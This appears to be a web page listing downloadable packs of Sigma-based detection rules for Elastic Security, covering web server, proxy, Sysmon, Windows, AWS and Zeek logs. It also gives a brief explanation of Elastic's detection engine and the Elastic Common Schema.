Detection rules downloads

A collection of rules based on the Sigma detection rules for web server looks, e.g. apache, nginx or IIS.

A collection of rules based on the Sigma detection rules for proxy server and web server looks, e.g. zeek or suricata.

A collection of rules based on the Sigma detection rules for Windows Sysmon events based on Winlogbeat data.

A collection of rules based on the Sigma rules for Windows (process creation folder) based on Winlogbeat data .

A collection of rules based on the Sigma rules for Windows (inbuilt folder) based on Winlogbeat data .

A collection of rules based on the Sigma rules for AWS based on the Filebeat AWS module and Elastic agent integration.

A collection of rules based on the Sigma rules for Zeek based on the Filebeat Zeek module.


More about Detection rules

The SIEM detection rules for Elastic Security defining how the Elastic Security detection engine is investigating for threats. The detection rules are a common set of rules that can be used to analyze existing data. Elastic delivers many rules OOTB. Show all pre build Elastic rules.

By using the defined fields and categories in ECS (Elastic Common Schema), rules automatically work with Beats logs, Elastic agent data and other data sources that map properly to ECS.

Elastic has opened the repository for this rules to let the community contribute to the rules. However there are other projects like Sigma that producing SIEM detection rules for different systems.